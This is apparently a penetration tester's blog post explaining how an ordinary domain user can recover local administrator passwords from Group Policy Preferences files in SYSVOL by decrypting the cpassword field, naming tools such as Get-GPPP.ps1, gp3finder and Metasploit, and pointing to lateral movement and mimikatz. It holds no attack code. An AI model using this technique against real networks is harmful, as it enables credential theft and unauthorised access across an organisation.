Lateral movement..Part I

Scenario: you are a normal user in your company’s domain. No admin privileges. Nothing. You can’t even install a program in your machine.

What if I told you, that you can be the local administrator on your machine and probably on MANY more in your organization?

I am not able to count the number of things you are able to do as a local admin (evil / non-evil) :-)…for this post am going to demonstrate how to simply move from a normal user and gain local admin privileges. This is an attack vector I have been using in various security assessments I have been doing. Time to let the cat out of the bag…haha.


What are Global Policy Preferences Passwords?

In a nutshell, sys admins have 100 plus machines on a domain, and want to configure all the machines, chances are they are bound to use the same local admin password to install programs and configure the machines in the domain. They use the GPO to do this; hence the use of the Global Policy Preference Password to conveniently push same password to all hosts in the domain. Convenience at the expense of security – how many times do we see that??


Ways to find the GPPP password?

To be honest, countless. But I shall show some few here..

  1. Manually traversing to \\<domain name>\SYSVOL\<domain name>\Policies\

Look for *.xml files; specifically Groups.xml or Services.xml.


Opening one of the Groups.xml files we see a cpassword field which is encrypted. Game over? NO. Microsoft published the decryption AES key here – a whole 32-byte AES key. Let that sink in.

So basically decrypt and have your local administrator password…in CLEARTEXT.

2. Use Powershell tools:

For the lazy ones, there are multiple powershell tools to find the GPPP. An example is the Get-GPPP.ps1 ,shoutout to this smart guy @obscuresec..


3. A custom tool designed to explicitly output the password in cleartext – gp3finder by Oliver Morton:


4. Trust metasploit not to get left out…msf FTW!

msf gppp

Okay,we get the point – it’s too easy to get this password.

Now that we have the local admin password..

The mere fact that you have got this password from GPPP tells you one thing – chances are that it is used on most if not all machines in the domain! Think about the lateral movement that is possible, the dumping of passwords – mimikatz, anyone?

That doesn’t so good for the blue teamers, right? In the next post we are going to see practical ways to mitigate this.

Remember this is not a new attack vector, reason I am putting this up is because in all penetration testing assessments I have been doing, this has been a recurring vulnerability.



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: